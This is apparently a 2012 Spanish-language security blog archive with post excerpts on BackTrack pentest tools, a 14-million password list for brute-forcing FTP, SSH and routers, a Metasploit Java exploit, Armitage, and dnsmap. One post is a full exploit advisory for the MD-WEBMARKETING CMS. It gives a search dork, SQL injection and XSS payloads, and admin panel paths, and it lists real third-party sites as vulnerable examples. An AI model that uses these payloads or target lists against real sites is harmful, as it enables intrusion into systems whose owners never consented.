martes, 27 de noviembre de 2012

[PAPER] Penetration Testing with BackTrack



INTRODUCCIÓN

MÉTODOS DE ANÁLISIS DE APLICACIONES WEB

Network Mapping
Information Gathering
CMS Identification
IDS/IPS Detection
Open Source Analysis
Web Crawlers
Vulnerability Assessment and Exploitation
Maintaining Access

NETWORK MAPPING

Nmap
Netifera

INFORMATION GATHERING

TheHarvester
Maltego

CMS IDENTIFICATION

BlindElephant
CMS-Explorer
WhatWeb

IDS/IPS DETECTION

Waffit

OPEN SOURCE ANALYSIS

GHDB (Google Hacking DataBase)
Xssed

WEB CRAWLERS

WebShag
DirBuster

VULNERABILITY ASSESSMENT AND EXPLOITATION

JoomScan
SqlMap
Fimap
Shodan
W3af
Uniscan
Nikto

MAINTAINING ACCESS

Weevely
WeBaCoo
MsfPayload

CONCLUSIÓN

DOWNLOAD

VER ONLINE

martes, 20 de noviembre de 2012

[xHydra] BruteForcing FTP - Website - Router con 14 Millones de Password




INTRODUCCIÓN:

Según OWASP el Brute Forcing consiste en enumerar sistemáticamente todos los posibles candidatos para la solución y comprobar si cada candidato satisface la declaración del problema. En las pruebas de penetración hacia aplicaciones web, el problema al que nos vamos a enfrentar con la mayor parte es muy a menudo con la necesidad de tener una cuenta de usuario válida para acceder a la parte interna de la aplicación.

Pero para realizar un BruteForcing seguro y rapido, siempre es necesario contar con una buena lista de contraseñas para que el trabajo sea mas eficiente, para tal caso y pensando en ustedes voy a compartir una lista de 14 millones de Password's para el respectivo crackeo de Password's ya sea en Servidores Web's, Servicios FTP, SSH y Router's, que pueden ser usados con el John The Riper, Hydra u otras herramientas que se utilizan para el BruteForcing en cualquier sistema operativo.

martes, 13 de noviembre de 2012

[CVE-2012-5076] Explotando Java Applet JAX-WS Remote Code Execution



Recientemente se ha publicado una nueva vulnerabilidad en Java, denominada Java Applet JAX-WS Remote Code Execution descubierta por @_juan_vazquez_ la cual afecta a la versión 1.7.0_07-b10 y anteriores.

El exploit respectivo para aprovecharse de esta vulnerabilidad se encuentra respectivamente en los modulos de Metasploit y se puede utilizar con tal solo realizar un msfupdate.

El modulo disponible en Metasploit para esta vulnerabilidad se aprovecha de los JAX-WS classes desde un Java Applet para ejecutar código arbitrario Java.

Los procedimientos y requerimientos para explotar esta vulnerabilidad son muy simples, solo basta con tener BackTrack y un Sistema Virtual para realizar las pruebas.

sábado, 10 de noviembre de 2012

[Armitage - Metasploit] Introduccion - Information Gathering - Exploitation - Post Exploitation



INTRODUCCIÓN:

Todas las personas que se dedican al Pen-test o son activos en el campo de la Seguridad Informática tienen conocimiento sobre lo que es Metasploit y el trabajo que realiza, sin embargo el aprendizaje inicial para Metasploit puede ser intimidante para los 'novatos' que estén interesados en realizar pruebas de penetración, pero mayormente no tienen idea por donde empezar.

Armitage es una representación gráfica avanzada de Metasploit Framework, sus principales características son de mapear cada etapa de la Prueba de Penetración, la Recopilación de Información, Explotación y Post Explotacion, con unos pocos clics.

Armitage se encuentra disponible en todas las versiones del BackTrack, y puede ser instalado en cualquier distro de linux sin problema alguno.

martes, 6 de noviembre de 2012

MD-WEBMARKETING - SQL Injection/Cross Site Scripting Vulnerabilities




###############################################################################################################
# Exploit Title : MD-WEBMARKETING - SQL Injection/Cross Site Scripting Vulnerabilities
# Date : 06-11-2012
# Author : Caleb Bucker (Independent Security Researcher)
# Contact : https://twitter.com/CalebDrugs
# Website : www.calebbucker.blogspot.com
# Vendor       : MD Webmarketing
# URL Vendor : http://mdwebmarketing.com.br/
# Category : WebApps
# Dork : "Desenvolvido por: MD-WEBMARKETING" inurl:.php?id=
# Tested on: : BackTrack 5 R3
###############################################################################################################


###############################################################################################################

[~] Exploit:

http://www.site-web.com/***.php?id=                 [SQL Injection]

http://www.site-web.com/***.php?id=**********&busca= [Cross Site Scripting]

###############################################################################################################

[~] Example Sites SQL Injection:

http://www.acontecenews.com.br/exibe.php?id=65637'
http://www.revistapenseleve.com.br/exibe.php?id=1331'
http://itaporaagora.com.br/exibe.php?id=133050'
http://www.pierreadrileiloes.com.br/exibe.php?id=61712'
http://www.viaruralagro.com.br/loja/detalhes.php?id=24'

###############################################################################################################

[~] Example Sites Cross Site Scripting:

http://www.acontecenews.com.br/exibe.php?id=62587&cod_editorial=&url=index.php&pag=&busca="<h2>TEST</h2>
http://www.itaporaagora.com.br/exibe.php?id=132094&cod_editorial=&url=exibe.php&pag=&busca="<h2>TEST</h2>
http://www.deodapolisagora.com.br/exibe.php?id=131746&cod_editorial=&url=&pag=&busca="<h2>TEST</h2>

###############################################################################################################

[~] Screenshot:

http://imageshack.us/a/img443/2181/testwwh.png     [SQL Injection]
http://imageshack.us/a/img687/7656/test2sc.png    [Cross Site Scripting]

###############################################################################################################

[~] Location Panel Administrative:

http://www.site-web.com/adm
http://www.site-web.com/admin

###############################################################################################################

# Greet'z | @Pwnakil | @CLsecurity2011 & All my friend

###############################################################################################################

More Info: http://packetstormsecurity.org/files/117927/MD-Webmarketing-Cross-Site-Scripting-SQL-Injection.html

DNS Network Mapper




Dnsmap es un mapeador de red (Network Mapper), normalmente se conoce como Brute Force para Subdominios, originalmente publicado en 2006, utilizado por pentesters durante la recopilación de información/enumeración en la fase de evaluación de la seguridad de la infraestructura (objetivo). 


Dnsmap es una herramienta programada en Python de código abierto y probado en el sistema operativo basado en Linux aunque puede usarse en FreeBSD y Windows mediante el uso de Cygwin, dnsmap actualmente esta incluido en BackTrack 5 R3.